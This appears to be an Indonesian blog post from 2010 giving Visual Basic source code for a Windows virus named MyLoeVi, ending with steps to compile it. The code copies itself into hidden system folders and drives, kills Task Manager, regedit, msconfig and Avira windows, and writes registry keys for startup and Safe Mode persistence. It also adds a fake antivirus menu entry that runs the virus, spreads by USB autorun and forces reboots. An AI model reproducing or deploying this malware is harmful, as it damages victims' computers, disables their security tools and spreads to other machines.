'membuat virus dengan nama hay.exe
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderStartUp & "\MyLoeVi.exe"
SetAttr FolderStartUp & "\hay.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderMyDocuments & "\MyLoeVi.exe"
SetAttr FolderMyDocuments & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama gWgTLoe.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderTemplates & "\gWgTLoe.exe"
SetAttr FolderTemplates & "\gWgTLoe.Exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama smzs.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderPrintHood & "\smzs.Exe"
SetAttr FolderPrintHood & "\smzs.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderNetHood & "\MyLoeVi.Exe"
SetAttr FolderNetHood & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama cssz.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderFavorites & "\cssz.Exe"
SetAttr FolderFavorites & "\cssz.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama System.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderSendTo & "\System.Exe"
SetAttr FolderSendTo & "\System.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderWindows & "\MyLoeVi.Exe"
SetAttr FolderWindows & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\MyLoeVi.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "D:\System.exe"
Gandakefolder
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
'menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow("#32770", "RUN") 'jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "System Configuration Utility") 'msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Windows Task Manager") 'task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Avira AntiVir Personal - Free Antivirus") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "AntiVir Guard: Attention, Detection!") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("RegEdit_RegEdit", vbNullString) 'regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
InfeksiRegistry
End Sub
Private Sub Timer2_Timer()
On Error Resume Next
TotalTenthDetik = TotalTenthDetik + 1
TenthDetik = TotalTenthDetik Mod 60
TotalDetik = Int(TotalTenthDetik / 60)
Detik = TotalDetik Mod 60
a = 30 - Detik
Label1.Caption = "Time: " & a
Shell "C:\MyLoeVi.exe"
Shell "D:\System.exe"
If Len(Detik) = 1 Then
Detik = Detik
End If
If Detik / 2 = 1 Then
Timer1.Enabled = True
Gandakefolder
GandaKeFD
BuatAutorunInf
End If
If a = 0 Then
Timer2.Enabled = False
Shell "shutdown -r -t 3", vbHide
Me.Visible = False
MsgBox "Matilah Komputer kw ko dalam 3 detik!" & vbCrLf & "selamat jalan kekasih Q...",
vbOKOnly, "Good Bye..."
Shell "shutdown -r -t 3", vbHide
Timer2.Enabled = False
End If
Gandakefolder
InfeksiRegistry
App.TaskVisible = False
End Sub
Private Sub AntiRegestry()
‘anti regestry jika tidak sengaja virus dijalankan sehingga virus bisa dijinakan
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", 0,
"REG_DWORD" 'menghapus semua icon di dekstop
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ 'virus akan tetap berjalan pada tipe
windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & """"
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & """"
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ 'virus akan tetap berjalan pada tipe
windows Safe Mode
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites
& "" 'virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 0, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 0, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSu
perHidden", 1, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSupe
rHidden", 1, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 0,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 0,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRe
gistryTools", 0, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegi
stryTools", 0, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderTemplates & "" 'gWgTLoe.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderSendTo & "" 'System.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
0, "REG_DWORD" 'search pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
0, "REG_DWORD" 'Ssearch pd star menu hilang
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose"
, 0, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose",
0, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\",
FolderFavorites & "" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan
Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives
", 0, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives",
0, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileM
enu", 0, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun",
0, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_Sho
wControlPanel", 1, "REG_DWORD"
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertie
sMyComputer", 0, "REG_DWORD"
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoProperti
esMyComputer", 0, "REG_DWORD"
End Sub
Buat File EXE nya, dengan cara:
Klik File Make Project.Exe
MyLoeVi Siap dijalankan.
Jika anda menjalankan MyLoeVi dengan tidak sengaja, maka anda bisa menghentikannya
dengan cara mengklik tombol End pada form virus, terus masukan password’a, passwordnya disini
“close”
Setelah itu hapus file virusanya.
Jumat, 12 November 2010
Langganan:
Postingan (Atom)